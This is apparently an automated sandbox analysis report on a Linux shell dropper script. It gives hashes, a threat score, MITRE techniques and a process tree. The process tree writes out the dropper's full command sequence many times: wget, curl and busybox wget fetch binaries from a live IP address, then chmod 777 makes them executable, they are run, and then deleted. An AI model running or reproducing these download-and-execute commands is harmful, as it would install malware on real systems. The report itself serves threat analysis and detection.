4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8

General

Target

4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
Size

10KB
MD5

01b56d1b9cc005de6042881dafcef1bf
SHA1

37f98670c045d4e2627287b76bed156bae8d9a10
SHA256

4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8
SHA512

617294ee58e825e6af28f02ab893ca33b04be9f8b1154d6f335a5b8085e2706046661ab704c92730764d6e1b132af69593e9d054e4fe2a31c9aa326ab52f6ac2
SSDEEP

192:qfHqRU7VKbQJxAcqZdGhBu4pHZdGhBNTfHqTY9JxAcp:pS7VKblKLs9

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
820	chmod
871	chmod
919	chmod
925	chmod
961	chmod
813	chmod
757	chmod
913	chmod
949	chmod
751	chmod
985	chmod
889	chmod
955	chmod
967	chmod
979	chmod
901	chmod
931	chmod
895	chmod
907	chmod
943	chmod
973	chmod
883	chmod
854	chmod
877	chmod
745	chmod
826	chmod
937	chmod
785	chmod

Executes dropped EXE 28 IoCs

Processes:

SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkRnRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTXUA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6rmedDNaZWnAAKGCL99nsOVsR0T2cOALswOvExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYxDTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlmaW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWdTG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6TfJVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDRyi9OMLXy50JsPYzex2KzU50mKnzgWlS5jKjc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hkymOJKI6e54s7cAI21O69RLnCAHtK57R3HmYBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXtTG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6TfJVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDRyi9OMLXy50JsPYzex2KzU50mKnzgWlS5jKjc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hkymOJKI6e54s7cAI21O69RLnCAHtK57R3HmYBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXtrmedDNaZWnAAKGCL99nsOVsR0T2cOALswOSzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkRnRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTXUA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYxDTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlmaW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt	curl
File opened for modification	/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK	curl
File opened for modification	/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6	curl
File opened for modification	/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx	curl
File opened for modification	/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX	curl
File opened for modification	/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf	curl
File opened for modification	/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR	curl
File opened for modification	/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO	curl
File opened for modification	/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8	curl
File opened for modification	/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8	curl
File opened for modification	/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk	curl
File opened for modification	/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk	curl
File opened for modification	/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR	curl
File opened for modification	/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm	curl
File opened for modification	/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf	curl
File opened for modification	/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm	curl
File opened for modification	/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO	curl
File opened for modification	/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK	curl
File opened for modification	/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR	curl
File opened for modification	/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm	curl
File opened for modification	/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt	curl
File opened for modification	/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx	curl
File opened for modification	/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd	curl
File opened for modification	/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR	curl
File opened for modification	/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX	curl
File opened for modification	/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6	curl
File opened for modification	/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm	curl
File opened for modification	/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd	curl

/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
/tmp/4c60fa2eae641103e8c18fec6273816c01db116510c35494e1c5461391e5dcd8.sh
1⤵
PID:713

/bin/rm
/bin/rm bins.sh
2⤵
PID:716

/usr/bin/wget
wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
PID:721

/usr/bin/curl
curl -O http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
PID:743

/bin/chmod
chmod 777 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
- File and Directory Permissions Modification
PID:745

/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
./SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
- Executes dropped EXE
PID:746

/bin/rm
rm SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
PID:747

/usr/bin/wget
wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
PID:748

/usr/bin/curl
curl -O http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
PID:750

/bin/chmod
chmod 777 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
- File and Directory Permissions Modification
PID:751

/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
./j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
- Executes dropped EXE
PID:752

/bin/rm
rm j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
PID:753

/usr/bin/wget
wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
PID:754

/usr/bin/curl
curl -O http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
PID:756

/bin/chmod
chmod 777 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
- File and Directory Permissions Modification
PID:757

/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
./nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
- Executes dropped EXE
PID:758

/bin/rm
rm nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
PID:761

/usr/bin/wget
wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
PID:762

/usr/bin/curl
curl -O http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
PID:779

/bin/chmod
chmod 777 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
- File and Directory Permissions Modification
PID:785

/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
./UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
- Executes dropped EXE
PID:786

/bin/rm
rm UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6
2⤵
PID:789

/usr/bin/wget
wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
PID:791

/usr/bin/curl
curl -O http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:798

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
PID:808

/bin/chmod
chmod 777 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
- File and Directory Permissions Modification
PID:813

/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
./rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
- Executes dropped EXE
PID:814

/bin/rm
rm rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
PID:816

/usr/bin/wget
wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
PID:817

/usr/bin/curl
curl -O http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
PID:819

/bin/chmod
chmod 777 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
- File and Directory Permissions Modification
PID:820

/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
./vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
- Executes dropped EXE
PID:821

/bin/rm
rm vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx
2⤵
PID:822

/usr/bin/wget
wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
PID:823

/usr/bin/curl
curl -O http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
PID:825

/bin/chmod
chmod 777 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
- File and Directory Permissions Modification
PID:826

/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
./DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
- Executes dropped EXE
PID:828

/bin/rm
rm DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm
2⤵
PID:831

/usr/bin/wget
wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
PID:833

/usr/bin/curl
curl -O http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
PID:849

/bin/chmod
chmod 777 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
- File and Directory Permissions Modification
PID:854

/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
./aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
- Executes dropped EXE
PID:855

/bin/rm
rm aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd
2⤵
PID:858

/usr/bin/wget
wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
PID:859

/usr/bin/curl
curl -O http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
PID:870

/bin/chmod
chmod 777 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
- File and Directory Permissions Modification
PID:871

/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
./TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
- Executes dropped EXE
PID:872

/bin/rm
rm TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
PID:873

/usr/bin/wget
wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
PID:874

/usr/bin/curl
curl -O http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
PID:876

/bin/chmod
chmod 777 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
- File and Directory Permissions Modification
PID:877

/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
./JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
- Executes dropped EXE
PID:878

/bin/rm
rm JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
PID:879

/usr/bin/wget
wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
PID:880

/usr/bin/curl
curl -O http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
PID:882

/bin/chmod
chmod 777 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
- File and Directory Permissions Modification
PID:883

/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
./yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
- Executes dropped EXE
PID:884

/bin/rm
rm yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
PID:885

/usr/bin/wget
wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
PID:886

/usr/bin/curl
curl -O http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
PID:888

/bin/chmod
chmod 777 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
- File and Directory Permissions Modification
PID:889

/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
./jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
- Executes dropped EXE
PID:890

/bin/rm
rm jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
PID:891

/usr/bin/wget
wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
PID:892

/usr/bin/curl
curl -O http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
PID:894

/bin/chmod
chmod 777 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
- File and Directory Permissions Modification
PID:895

/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
./ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
- Executes dropped EXE
PID:896

/bin/rm
rm ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
PID:897

/usr/bin/wget
wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
PID:898

/usr/bin/curl
curl -O http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
PID:900

/bin/chmod
chmod 777 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
- File and Directory Permissions Modification
PID:901

/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
./YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
- Executes dropped EXE
PID:902

/bin/rm
rm YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
PID:903

/usr/bin/wget
wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
PID:904

/usr/bin/curl
curl -O http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
PID:906

/bin/chmod
chmod 777 TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
- File and Directory Permissions Modification
PID:907

/tmp/TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
./TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
- Executes dropped EXE
PID:908

/bin/rm
rm TG3A2xjIGk8PWwrKi9yghpVIaZbzJuV6Tf
2⤵
PID:909

/usr/bin/wget
wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
PID:910

/usr/bin/curl
curl -O http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
PID:912

/bin/chmod
chmod 777 JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
- File and Directory Permissions Modification
PID:913

/tmp/JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
./JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
- Executes dropped EXE
PID:914

/bin/rm
rm JVIdHrYEvGMdZ00eGrb8zITfM1NNUWibDR
2⤵
PID:915

/usr/bin/wget
wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
PID:916

/usr/bin/curl
curl -O http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
PID:918

/bin/chmod
chmod 777 yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
- File and Directory Permissions Modification
PID:919

/tmp/yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
./yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
- Executes dropped EXE
PID:920

/bin/rm
rm yi9OMLXy50JsPYzex2KzU50mKnzgWlS5jK
2⤵
PID:921

/usr/bin/wget
wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
PID:922

/usr/bin/curl
curl -O http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
PID:924

/bin/chmod
chmod 777 jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
- File and Directory Permissions Modification
PID:925

/tmp/jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
./jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
- Executes dropped EXE
PID:926

/bin/rm
rm jc8PQuWtX4SmXjsM6uzWFfZcNgBUpAn1hk
2⤵
PID:927

/usr/bin/wget
wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
PID:928

/usr/bin/curl
curl -O http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
PID:930

/bin/chmod
chmod 777 ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
- File and Directory Permissions Modification
PID:931

/tmp/ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
./ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
- Executes dropped EXE
PID:932

/bin/rm
rm ymOJKI6e54s7cAI21O69RLnCAHtK57R3Hm
2⤵
PID:933

/usr/bin/wget
wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
PID:934

/usr/bin/curl
curl -O http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
PID:936

/bin/chmod
chmod 777 YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
- File and Directory Permissions Modification
PID:937

/tmp/YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
./YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
- Executes dropped EXE
PID:938

/bin/rm
rm YBFl2bsRNkNwDnbK1CbwImsnlNNpcffAXt
2⤵
PID:939

/usr/bin/wget
wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
PID:940

/usr/bin/curl
curl -O http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
PID:942

/bin/chmod
chmod 777 rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
- File and Directory Permissions Modification
PID:943

/tmp/rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
./rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
- Executes dropped EXE
PID:944

/bin/rm
rm rmedDNaZWnAAKGCL99nsOVsR0T2cOALswO
2⤵
PID:945

/usr/bin/wget
wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
PID:946

/usr/bin/curl
curl -O http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
PID:948

/bin/chmod
chmod 777 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
- File and Directory Permissions Modification
PID:949

/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
./SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
- Executes dropped EXE
PID:950

/bin/rm
rm SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8
2⤵
PID:951

/usr/bin/wget
wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
PID:952

/usr/bin/curl
curl -O http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
PID:954

/bin/chmod
chmod 777 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
- File and Directory Permissions Modification
PID:955

/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
./j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
- Executes dropped EXE
PID:956

/bin/rm
rm j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR
2⤵
PID:957

/usr/bin/wget
wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
PID:958

/usr/bin/curl
curl -O http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
PID:960

/bin/chmod
chmod 777 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
- File and Directory Permissions Modification
PID:961

/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
./nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX
2⤵
- Executes dropped EXE
PID:962

